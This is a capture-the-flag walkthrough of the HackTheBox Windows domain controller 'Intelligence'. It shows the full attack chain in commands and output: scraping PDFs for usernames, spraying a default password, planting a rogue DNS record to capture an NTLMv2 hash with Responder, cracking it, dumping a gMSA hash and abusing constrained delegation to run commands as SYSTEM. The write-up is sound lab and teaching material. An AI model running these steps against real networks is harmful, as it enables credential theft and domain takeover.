Intelligence - [HTB]

Cover Image for Intelligence - [HTB]
Marmeus
Marmeus

Introduction

Intelligence is a Windows Active Directory machine from HackTheBox where the attacker will have to enumerate public files in order to find some users and the credentials for obtaining the user flag. Then, will have to add a fake DNS into the domain DNS for obtaining Ted's creds. Finally, the attacker will have to obtain a GSMA password allowing it to impersonate the Admin Domain obtaining the root flag.

Enumeration

As always, let's start finding all opened ports in the machine with nmap.

kali@kali:~/Documents/HTB/Intelligence$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.248
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-21 17:21 EDT
Nmap scan report for 10.10.10.248
Host is up (0.041s latency).
Not shown: 65514 filtered ports
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49691/tcp open  unknown
49692/tcp open  unknown
49702/tcp open  unknown
49714/tcp open  unknown
55797/tcp open  unknown
57669/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 56.13 seconds

Then, we continue with a deeper scan of every opened port, getting more information about each service.

kali@kali:~/Documents/HTB/Intelligence$ sudo nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49685,49686,49704,49708 -T5 -Pn -oN PortsDepth.txt 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.044s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-08 04:05:09Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-08T04:06:39+00:00; +7h00m02s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-08T04:06:38+00:00; +7h00m03s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-08T04:06:39+00:00; +7h00m02s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-08T04:06:38+00:00; +7h00m03s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
49708/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-08T04:05:59
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul  7 17:06:37 2021 -- 1 IP address (1 host up) scanned in 96.96 seconds

Looking at the web page there are some documents that we can download.

Intelligence web page

Both of theme have usernames stored in the metadata fields. However, we can not do much with them.

kali@kali:~/Documents/HTB/Intelligence$ exiftool 2020-* | grep Creator
Creator                         : William.Lee
Creator                         : Jose.Williams

Nonetheless, under the documents directory seems to be are more files, following the same syntax but changing the date.

In order to download them all, I created the following script.

import requests
import os

URL_BASE="http://10.10.10.248/documents/2020-{:02d}-{:02d}-upload.pdf"

for i in range(1,13):
    for j in range(1,32):
        URL_FINAL=URL_BASE.format(i,j)
        print URL_FINAL
        status=requests.get(URL_FINAL).status_code
        if status==200:
            os.system("wget "+URL_FINAL)

You only need to execute the following commands in order to obtain a list with all the users.

kali@kali:~/Documents/HTB/Intelligence$ python obtainPDFs.py
kali@kali:~/Documents/HTB/Intelligence$ exiftool 2020-* | grep Creator | awk '{print $3}' | sort -u > users.txt

Furthermore, inside the document 2020-06-04-upload.pdf there is the following text.

New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.

Exploitation

We can find out which user the password belongs to thanks to crackmapexec.

kali@kali:~/Documents/HTB/Intelligence$ crackmapexec smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876 
SMB         10.10.10.248    445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 

Now we can access to all shared folders.

kali@kali:~/Documents/HTB/Intelligence$ smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -H 10.10.10.248
[+] IP: 10.10.10.248:445        Name: intelligence.htb                                  
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        IT                                                      READ ONLY
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY

Under the Users share we can retrieve the user flag.

kali@kali:~/Documents/HTB/Intelligence$ smbclient -U "Tiffany.Molina%NewIntelligenceCorpUser9876" //10.10.10.248/Users
smb: \Tiffany.Molina\Desktop\> dir
  .                                  DR        0  Sun Apr 18 20:51:46 2021
  ..                                 DR        0  Sun Apr 18 20:51:46 2021
  user.txt                           AR       34  Wed Jul 21 12:50:12 2021

Privilege escalation 1

Under the share IT we can retrieve a powershell script.

kali@kali:~/Documents/HTB/Intelligence$ smbclient -U "Tiffany.Molina%NewIntelligenceCorpUser9876" //10.10.10.248/IT
smb: \> dir
  .                                   D        0  Sun Apr 18 20:50:55 2021
  ..                                  D        0  Sun Apr 18 20:50:55 2021
  downdetector.ps1                    A     1046  Sun Apr 18 20:50:55 2021

                3770367 blocks of size 4096. 1460519 blocks available
smb: \> get downdetector.ps1 
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)

The script execute an Active Directory query in order to obtain all DNS domains under the Active Directory domain. Then, tries to access them sending the user credentials.

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
	try {
		$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
		if(.StatusCode -ne 200) {
			Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
		}
	} catch {}
}

Hence, we can add a our own domain in order to retrieve the user credentials with responder.

In order to add a domain we need to synchronise the kali's clock with the server's clock and execute dnstool.py.

kali@kali:~/Documents/HTB/Intelligence$ sudo ntpdate 10.10.10.248 
kali@kali:~/Documents/HTB/Intelligence$ python3 dnstool.py -u "intelligence\Tiffany.Molina" -p NewIntelligenceCorpUser9876 -a add -t A -r webMarmeus.intelligence.htb -d 10.10.14.245 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/media/sf_2_MisPostsBlog/HTB/Intelligence/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
  res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully

Then, we need to execute responder waiting up to 10 minutes in order to retrieve the credential.

kali@kali:~/Documents/HTB/Intelligence$ sudo responder -I tun0 -A 
[+] Listening for events...

[HTTP] NTLMv2 Client   : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:9751b32b8379208d:4D13215C35DA7AB5751CC22BF9055653:01010000000000001E8542EDC67ED701F92F22BD457D234700000000020008004C0047005900480001001E00570049004E002D0056003800330031005400480050004800510056003100040014004C004700590048002E004C004F00430041004C0003003400570049004E002D00560038003300310054004800500048005100560031002E004C004700590048002E004C004F00430041004C00050014004C004700590048002E004C004F00430041004C00080030003000000000000000000000000020000000865082CE41604DB9E1765B44E059B2CECE9C0D8C3C18D96009F717D40156250A001000000000000000000000000000000000000900400048005400540050002F007700650062006D00610072006D006500750073002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

With hashcat we can retrieve the actual NTLM password.

kali@kali:~/Documents/HTB/Intelligence$ hashcat -m 5600 tedHash.txt /usr/share/wordlists/rockyou.txt
[...]
TED.GRAVES::intelligence:9751b32b8379208d:4d13215c35da7ab5751cc22bf9055653:01010000000000001e8542edc67ed701f92f22bd457d234700000000020008004c0047005900480001001e00570049004e002d0056003800330031005400480050004800510056003100040014004c004700590048002e004c004f00430041004c0003003400570049004e002d00560038003300310054004800500048005100560031002e004c004700590048002e004c004f00430041004c00050014004c004700590048002e004c004f00430041004c00080030003000000000000000000000000020000000865082ce41604db9e1765b44e059b2cece9c0d8c3c18d96009f717d40156250a001000000000000000000000000000000000000900400048005400540050002f007700650062006d00610072006d006500750073002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.Teddy

Privilege escalation 2

After trying a lot of stuff, we can retrieve a GMSA password with Ted's credentials.

kali@kali:~/Documents/HTB/Intelligence$ git clone https://github.com/micahvandeusen/gMSADumper.git
kali@kali:~/Documents/HTB/Intelligence/gMSADumper$ python3 ./gMSADumper/gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::47e89a6afd68e3872ef1acaf91d0b2f7

The service svc_init has the primitive msDS-AllowedToDelegateTo which could allow us to impersonate Domain Admins.

kali@kali:~/Documents/HTB/Intelligence$ sudo ldapsearch -x -h 10.10.10.248 -D "intelligence\TED.GRAVES" -w "Mr.Teddy" -b "CN=svc_int,CN=Managed ServiceDC=intelligence,DC=htb" 
[...]
msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb
[...]

In order to impersonate the service as Administrator we need synchronise the clocks once more and execute getST.py.

kali@kali:~/Documents/HTB/Intelligence$ sudo net time set -S 10.10.10.248
kali@kali:~/Documents/HTB/Intelligence$ getST.py intelligence.htb/svc_int$ -spn www/dc.intelligence.htb -hashes :47e89a6afd68e3872ef1acaf91d0b2f7 -impersonate administrator
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache

Now, we are able to execute any commands as nt authority\system, obtaining the root flag.

kali@kali:~/Documents/HTB/Intelligence$ export KRB5CCNAME=administrator.ccache
kali@kali:~/Documents/HTB/Intelligence$ atexec.py -k -no-pass dc.intelligence.htb 'whoami'
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[!] This will work ONLY on Windows >= Vista
[*] Creating task \EjMKGuQK
[*] Running task \EjMKGuQK
[*] Deleting task \EjMKGuQK
[*] Attempting to read ADMIN$\Temp\EjMKGuQK.tmp
nt authority\system

kali@kali:~/Documents/HTB/Intelligence$ atexec.py -k -no-pass dc.intelligence.htb 'type C:\Users\Administrator\Desktop\root.txt'
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[!] This will work ONLY on Windows >= Vista
[*] Creating task \usqqykxq
[*] Running task \usqqykxq
[*] Deleting task \usqqykxq
[*] Attempting to read ADMIN$\Temp\usqqykxq.tmp
[CENSORED]